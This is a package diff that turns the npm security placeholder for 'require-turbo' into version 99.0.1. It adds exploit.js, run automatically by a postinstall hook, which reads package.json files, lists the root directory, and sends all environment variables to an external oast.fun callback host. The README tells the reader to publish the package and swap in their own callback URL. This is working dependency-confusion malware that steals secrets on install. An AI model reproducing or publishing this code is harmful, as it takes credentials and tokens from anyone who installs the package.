require-turbo 0.0.1-security → 99.0.1

package/README.md

@@ -1,5 +1,5 @@
-# Security holding package
+Clone this into a package name directory 
+run 
+npm publish --access public
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=require-turbo for more information.
+NOTE: change the attacker.com to your callbackurl or burp collaborator 

package/exploit.js

@@ -0,0 +1,24 @@
+const fs = require('fs');
+const http = require('http');
+const path = require('path');
+
+const monorepoPath = '/';
+let data = '';
+try {
+  // Read root package.json
+  data += fs.readFileSync(path.join(monorepoPath, 'package.json'), 'utf8');
+  // Read core package.json
+  data += '\n' + fs.readFileSync(path.join(monorepoPath, 'packages/core/package.json'), 'utf8');
+  // Enumerate directory structure
+  const structure = fs.readdirSync(monorepoPath, { withFileTypes: true })
+    .map(dirent => `${dirent.isDirectory() ? 'DIR' : 'FILE'}: ${dirent.name}`)
+    .join('\n');
+  data += '\nStructure:\n' + structure;
+  // Capture environment variables
+  data += '\nEnvironment:\n' + JSON.stringify(process.env);
+} catch (e) {
+  data += `Error: ${e.message}`;
+}
+
+// Exfiltrate to attacker server
+http.get(`http://gyjowarodlxnvtkmuxmo70qc308txlla7.oast.fun/callback?data=${encodeURIComponent(data)}`);

package/package.json

@@ -1,6 +1,8 @@
 {
   "name": "require-turbo",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.0.1",
+  "scripts": {
+    "postinstall": "node exploit.js"
+  },
+  "files": ["exploit.js"]
 }